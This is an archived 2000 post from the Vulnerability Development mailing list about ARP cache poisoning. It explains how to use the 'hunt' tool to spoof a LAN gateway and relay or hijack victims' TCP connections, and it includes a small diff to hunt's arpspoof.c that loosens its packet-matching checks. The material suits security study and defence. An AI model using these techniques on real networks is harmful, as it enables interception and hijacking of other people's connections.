Vulnerability Development mailing list archives
Re: More on ARP cache poisoning
From: lamont () ICOPYRIGHT COM (Granquist, Lamont)
Date: Thu, 3 Feb 2000 08:16:26 -0800
On Wed, 2 Feb 2000, Sebastian wrote:
Yea, this has been in use for like 3 years now, just grab hunt and ARP relay external connections by ARP spoofing the gateway. There is no problem with redirecting/relaying/denying any TCP connection within a switched/non-switched LAN when there are no static ARP entries. Just ARP spoof the gateway address into the victims cache and have ip forwarding enabled.
You also need the following patch for hunt 1.3: --- arpspoof.c~ Sun Oct 3 10:16:35 1999 +++ arpspoof.c Sun Oct 3 10:16:58 1999 @@ -432,8 +432,8 @@ list_lock(&l_arp_spoof); list_iter_set(&li, &l_arp_spoof); while ((asi = list_iter_get(&li))) { - if (p->p_iph->saddr == asi->dst_addr && - p->p_iph->daddr == asi->src_addr && + if (/* p->p_iph->saddr == asi->dst_addr && + p->p_iph->daddr == asi->src_addr && */ memcmp(p->p_ethh->h_source, asi->dst_mac, ETH_ALEN) == 0 && memcmp(p->p_ethh->h_dest, asi->src_fake_mac, ETH_ALEN) == 0) { packet_want(p); (if that doesn't apply you probably lost the tabs) I've also found that Cisco 2621s don't seem to accept the gratuitous ARPs that hunt sends out.
Current thread:
- More on ARP cache poisoning Clifford, Shawn A (Feb 01)
- Re: More on ARP cache poisoning Forrest W. Christian (Feb 01)
- Re: More on ARP cache poisoning Sebastian (Feb 02)
- Re: More on ARP cache poisoning Granquist, Lamont (Feb 03)
- Re: More on ARP cache poisoning ulan (Feb 02)
- <Possible follow-ups>
- Re: More on ARP cache poisoning Clifford, Shawn A (Feb 01)
- Re: More on ARP cache poisoning Dug Song (Feb 01)
- Re: More on ARP cache poisoning Mudge (Feb 03)
- no comment Michal Zalewski (Feb 02)
- Re: no comment Michal Zalewski (Feb 02)
- Re: More on ARP cache poisoning Dug Song (Feb 01)
- Re: More on ARP cache poisoning Bryce Walter (Feb 02)
- Re: More on ARP cache poisoning Ron Parker (Feb 03)